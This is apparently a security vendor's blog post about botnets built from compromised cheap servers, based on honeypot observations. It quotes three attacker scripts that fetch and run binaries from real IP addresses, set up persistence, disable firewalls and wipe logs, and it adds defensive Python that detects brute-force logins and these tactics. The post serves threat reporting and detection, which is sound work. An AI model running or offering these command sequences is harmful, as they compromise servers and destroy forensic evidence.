In the last few days we have heard a lot about the Mirai Internet-of-Things botnet, which caused a DDoS attack against Dyn. But Mirai is a relatively small botnet, because the majority of consumer IoT devices sit behind home routers and cannot be easily reached from the Internet even when they are vulnerable. These devices also have relatively limited CPU power and bandwidth.

On the horizon we can see a much bigger problem: compromised servers in data centers. Decent VPS or KVM hosting has become very cheap nowadays, starting at about $5 per month. For that money a customer gets a server with a dedicated IP address. It’s affordable and convenient for many purposes: web hosting, a VPN server, cloud storage, mail servers, torrents, git, games, or just for fun. Basic knowledge of the OS is enough for the initial setup, so anybody can own an Internet-connected server. Making such a server fully secure is a different story. When you sign up for a free email service or social network, you will see suggestions on how to set a strong password and why you need two-factor authentication. But if you have your own server, nobody will warn you or take care of its security. Attackers will find ways to take control of the server and will start using it for their own purposes. In this case we are not talking about little IoT devices or even PCs, but about servers with a server-grade OS and a reliable 24/7 Internet connection.

At Cyphort, we continuously monitor our “deception” network, which contains specially configured vulnerable servers. In most cases, attackers use vulnerabilities in web frameworks or weak passwords to compromise servers.

Basic scenario of an SSH weak-password attack:

  1. Find IP addresses with an Internet-accessible SSH service
  2. Brute-force the password
  3. Log in
  4. Download the agent, or push it through the SSH stream
  5. Set execution attributes
  6. Execute the bot
  7. Set up persistence: init scripts, a cron job, or replaced system binaries
  8. Clean up command history and other evidence of the penetration
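From the defender's side, steps 1 to 3 leave their trace in sshd's authentication log. The following Python script is an added example, not part of the original post or of Cyphort's tooling: it parses constructed syslog-format sshd lines (the addresses are documentation ranges and the year is an assumption, since syslog timestamps omit it), flags a source that reaches a failure threshold within a sliding window, and then flags the successful password login that follows it.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd log lines (syslog format); the addresses are TEST-NET
# documentation ranges, not real attacker IPs.
SAMPLE_AUTH_LOG = """\
Oct 25 03:14:01 vps sshd[4101]: Failed password for root from 203.0.113.7 port 51012 ssh2
Oct 25 03:14:03 vps sshd[4103]: Failed password for root from 203.0.113.7 port 51014 ssh2
Oct 25 03:14:05 vps sshd[4105]: Failed password for invalid user admin from 203.0.113.7 port 51016 ssh2
Oct 25 03:14:07 vps sshd[4107]: Failed password for root from 203.0.113.7 port 51018 ssh2
Oct 25 03:14:09 vps sshd[4109]: Failed password for root from 203.0.113.7 port 51020 ssh2
Oct 25 03:14:12 vps sshd[4111]: Accepted password for root from 203.0.113.7 port 51022 ssh2
Oct 25 03:20:44 vps sshd[4200]: Failed password for deploy from 198.51.100.9 port 40000 ssh2
Oct 25 03:21:10 vps sshd[4202]: Accepted publickey for deploy from 198.51.100.9 port 40002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+"
)
ASSUMED_YEAR = 2016  # syslog timestamps carry no year; assumption for the sample

def parse_ts(ts):
    return datetime.strptime(f"{ASSUMED_YEAR} {ts}", "%Y %b %d %H:%M:%S")

def analyze(log_text, threshold=5, window_seconds=60):
    """Return findings as (kind, source_ip, user) tuples.
    'brute_force' fires when one source reaches `threshold` failed logins inside
    a sliding window (step 2); 'brute_force_success' fires when the same source
    then gets an 'Accepted password' (step 3): treat the server as compromised."""
    recent_failures = defaultdict(list)  # ip -> failure timestamps in the window
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, ts = m.group("ip"), parse_ts(m.group("ts"))
        window = [t for t in recent_failures[ip] if (ts - t).total_seconds() <= window_seconds]
        if m.group("result") == "Failed":
            window.append(ts)
            if len(window) == threshold:
                findings.append(("brute_force", ip, m.group("user")))
        elif m.group("method") == "password" and len(window) >= threshold:
            findings.append(("brute_force_success", ip, m.group("user")))
        recent_failures[ip] = window
    return findings
```

A key-based login after a single failure (the second source) is deliberately left alone; only password logins that follow a burst are flagged.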


When the bot is installed, attackers can do anything with the server. From our observation, most activities are related to targeted DDoS attacks, ad fraud, and sending phishing emails. Attackers also frequently use compromised servers as an alternative to Tor for traffic anonymization.

It’s hard to tell how many servers out there are compromised and could be used in coordinated DDoS attacks. We expect the attack bandwidth available from compromised servers to be much greater than that from compromised IoT devices.

Cyphort’s deception network collected a list of the most frequently used passwords in SSH brute-force attacks.

If a server is exposed to the Internet and one of these passwords is used for SSH access, the server will be compromised in a matter of hours.

Here are examples of scripts which attackers execute after logging in:

Example 1:

apt-get install curl
yum install curl
curl http://121.40.175.22:15651/95 -o /tmp/gfty
killall -I -q Linux6 ifconf 123
killall -I -q LAdmins Admins asxper
killall -I -q g251 koiu winsx synlinshi
killall -I -q mysql sysyang ifconfigethO whoami ifconfigetho
killall -I -q gmetad cvn hanx .xdsy hssa ggu ggy gg azda .sshd bashpa
killall -I -q sshpa udevd .SSH2 .SSHH2 nhgbhhj zl pro proh DDos64 DDos32
killall -I -q dos64 dos32 sfewfesfs sfewfesfsh IptabLes tangwe IptabLex
killall -I -q .IptabLes .IptabLex 1 perl System Admins Linuxsys System32 rus
killall -I -q sql tel netstat -an ddos32_64.64 Admins koiu 315 64 udp
killall -I -q koi Chinesepoli 508 topsing weige udp
apt-get install wget
yum install wget
wget -c -O /tmp/gfty http://121.40.175.22:15651/95
chmod 0755 /tmp/gfty
/tmp/gfty
./gfty
nohup /tmp/gfty > /dev/null 2>&1 &
echo "service gfty">>/etc/rc.local
echo "/tmp/gfty">>/etc/rc.local
chattr +i /tmp/gfty
apt-get -y remove curl
yum -y remove curl
apt-get -y remove wget
yum -y remove wget
clear
history -c


Example 2:

cd /tmp
service iptables stop
rm -rf /etc/crontab
rm -rf /usr/bin/bsd-port/getty
rm -rf /usr/bin/bsd-port/*
killall -9 getty
find ./ -name "S90*" | grep -v S90single | grep -v reboot | grep -v S90halt |xargs rm -fr
ps -ef | grep -v 'ssh' |awk '{if ($3 == 1) print $2}' | xargs kill -9
yum -y install wget
wget -c http://222.186.34.174:9655/aa
chmod 777 aa
./aa
wget -c http://222.186.34.174:9655/17230
chmod 777 17230
./17230
iptables -I INPUT -s 116.31.123.159 -j DROP
iptables -I INPUT -s 183.60.110.74 -j DROP
iptables -I INPUT -s 122.224.32.32 -j DROP
iptables -I INPUT -s 149.56.107.161 -j DROP
iptables -I INPUT -s 104.223.10.48 -j DROP
iptables -I INPUT -s 178.170.68.69 -j DROP
iptables -I INPUT -s 158.69.219.235 -j DROP
iptables -I INPUT -s 164.132.170.78 -j DROP
iptables -I INPUT -s 149.202.219.49 -j DROP
iptables -I INPUT -s 124.16.31.156 -j DROP
iptables -I INPUT -s 183.61.171.149 -j DROP
iptables -I INPUT -s 61.157.167.74 -j DROP
iptables -I INPUT -s 119.63.44.35 -j DROP
iptables -I INPUT -s 42.51.23.80 -j DROP
iptables -I INPUT -s 104.129.35.178 -j DROP
iptables -I INPUT -s 103.31.240.133 -j DROP
iptables -I INPUT -s 100.42.227.29 -j DROP
iptables -I INPUT -s 107.160.46.234 -j DROP
iptables -I INPUT -s 222.186.34.73 -j DROP
iptables -I INPUT -s 36.249.123.134 -j DROP
iptables -I INPUT -s 118.193.214.160 -j DROP
iptables -I INPUT -s 104.37.213.35 -j DROP
iptables -I INPUT -s 58.54.39.51 -j DROP
iptables -I INPUT -s 23.247.5.12 -j DROP
iptables -I INPUT -s 23.247.5.11 -j DROP
iptables -I INPUT -s 51.255.84.218 -j DROP
iptables -I INPUT -s 98.126.8.114 -j DROP
iptables -I INPUT -s 222.174.5.13 -j DROP
iptables -I INPUT -s 123.184.16.119 -j DROP
iptables -I INPUT -s 103.214.169.184 -j DROP
iptables -I INPUT -s 103.236.220.90 -j DROP
iptables -I INPUT -s 103.55.25.57 -j DROP
iptables -I INPUT -s 103.55.26.91 -j DROP
iptables -I INPUT -s 104.223.6.159 -j DROP
iptables -I INPUT -s 107.160.46.234 -j DROP
iptables -I INPUT -s 111.160.17.8 -j DROP
iptables -I INPUT -s 114.112.27.83 -j DROP
iptables -I INPUT -s 115.231.219.34 -j DROP
iptables -I INPUT -s 115.28.206.48 -j DROP
iptables -I INPUT -s 116.31.116.28 -j DROP
iptables -I INPUT -s 117.18.4.110 -j DROP
iptables -I INPUT -s 122.225.102.131 -j DROP
iptables -I INPUT -s 123.184.16.119 -j DROP
iptables -I INPUT -s 14.29.47.15 -j DROP
iptables -I INPUT -s 149.202.210.93 -j DROP
iptables -I INPUT -s 180.97.163.228 -j DROP
iptables -I INPUT -s 183.60.0.0/24 -j DROP
iptables -I INPUT -s 183.60.110.83 -j DROP
iptables -I INPUT -s 183.60.149.196 -j DROP
iptables -I INPUT -s 183.60.149.199 -j DROP
iptables -I INPUT -s 183.61.171.147 -j DROP
iptables -I INPUT -s 198.44.177.102 -j DROP
iptables -I INPUT -s 204.44.67.19 -j DROP
iptables -I INPUT -s 23.234.25.143 -j DROP
iptables -I INPUT -s 23.234.28.85 -j DROP
iptables -I INPUT -s 51.255.66.195 -j DROP
iptables -I INPUT -s 58.218.200.111 -j DROP
iptables -I INPUT -s 61.160.195.78 -j DROP
iptables -I INPUT -s 61.174.49.203 -j DROP
iptables -I INPUT -s 66.102.253.30 -j DROP
iptables -I INPUT -s 66.249.65.123 -j DROP
iptables -I INPUT -s 115.231.17.7 -j DROP
iptables -I INPUT -s 61.174.49.203 -j DROP
echo> /var/log/wtmp
echo> /root/bash_history
echo> /var/log/syslog
echo> /var/log/messages
echo> /var/log/httpd/access_log
echo> /var/log/httpd/error_log
echo> /var/log/xferlog
echo> /var/log/secure
echo> /var/log/auth.log
echo> /var/log/user.log
echo> /var/log/wtmp
echo> /var/log/lastlog
echo> /var/log/btmp
echo> /var/run/utmp
history -c
exit

Example 3:

/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
iptables -F
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
iptables -F
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
iptables -F
chattr -i /usr/bin/wget
chmod 755 /usr/bin/wget
wget -P /bin/ http://43.230.144.65/zz -c
chmod 0755 /bin/zz
nohup /bin/zz > /dev/null 2>&1 &
chattr +i /usr/bin/wget
chmod 0 /usr/libexec/openssh/sftp-server
chattr +i /usr/libexec/openssh/sftp-server
echo ' ' > /var/log/wtmp
echo ' ' > /var/log/lastlog
echo ' ' > /var/log/messages
export HISTFILE=/dev/null
rm -f /var/log/wtmp
rm -f .bash_history
history -c
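All three scripts share one post-login pattern: stop the firewall, fetch and run a binary from /tmp or /bin, pin it with chattr +i, register it in rc.local, then truncate logs and clear the shell history. The Python triage below is an added example, not from the original post; it runs a simple regex rule per tactic over a constructed command stream (as a host agent would see it from auditd execve records or a shell audit log; the download address is a TEST-NET placeholder and the rule names are my own) and flags a session only when several tactics combine with an anti-forensics step.

```python
import re

# Detection rules for the post-login tactics visible in the three scripts above.
# Rule name -> regex applied to one shell command line (hypothetical names).
RULES = [
    ("firewall_disabled", re.compile(
        r"(?:^|\s)(?:service iptables stop|/etc/init\.d/iptables stop|iptables -F|SuSEfirewall2 stop)(?:\s|$)")),
    ("remote_download", re.compile(r"\b(?:wget|curl)\s.*https?://\S+")),
    ("exec_from_tmp", re.compile(r"(?:^|nohup\s+|&&\s*|;\s*)/tmp/\S+")),
    ("rc_local_persistence", re.compile(r">>\s*/etc/rc\.local")),
    ("immutable_bit", re.compile(r"\bchattr \+i\b")),
    ("log_truncation", re.compile(r"\becho\b[^|>]*>\s*/var/(?:log|run)/")),
    ("history_cleared", re.compile(r"\bhistory -c\b|HISTFILE=/dev/null|rm -f\s+\S*bash_history")),
    ("tool_removal", re.compile(r"\b(?:apt-get|yum)\s+-y\s+remove\s+(?:curl|wget)\b")),
]
ANTI_FORENSICS = {"log_truncation", "history_cleared"}

# Constructed command streams (e.g. from auditd execve records or a shell
# audit log); the download address is a TEST-NET placeholder, not a real indicator.
SESSION = """\
service iptables stop
wget -c -O /tmp/gfty http://192.0.2.10:15651/95
chmod 0755 /tmp/gfty
nohup /tmp/gfty > /dev/null 2>&1 &
echo "/tmp/gfty">>/etc/rc.local
chattr +i /tmp/gfty
echo> /var/log/wtmp
apt-get -y remove wget
history -c
"""
BENIGN = """\
cd /var/www
git pull
sudo systemctl restart nginx
curl -s https://example.invalid/health
history | grep restart
"""

def triage(session_text, min_tactics=3):
    """Map each matched tactic to the command line numbers that triggered it.
    A session is flagged when several distinct tactics appear and at least one
    of them is anti-forensics; ordinary admin sessions rarely combine those."""
    hits = {}
    for lineno, cmd in enumerate(session_text.splitlines(), 1):
        for name, rx in RULES:
            if rx.search(cmd):
                hits.setdefault(name, []).append(lineno)
    suspicious = len(hits) >= min_tactics and bool(ANTI_FORENSICS.intersection(hits))
    return {"tactics": sorted(hits), "lines": hits, "suspicious": suspicious}
```

A lone download (the benign session's health check) scores one tactic and is not flagged; the combination is what matters.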


For now, most hosting and cloud providers are not ready to spend money on detecting bots and malicious activity on their servers. It’s a very competitive global market and nobody wants to incur additional expenses. Developers of IoT devices are also not ready to spend time and money on security. It’s also a global market, and it’s important to release products as fast and as cheaply as possible. End users of devices and servers are not creating significant demand for better security, because most of them are not losing money directly, and compromised IoT devices may continue to work as usual.

On the other hand, advertising companies are forced to invent new techniques to distinguish real people from click bots, which requires many servers. Other companies have to spend part of their budget on anti-DDoS solutions and backup infrastructure, which again requires many servers. All of these companies need access to cheap, reliable servers with a good Internet connection… I guess you see my point.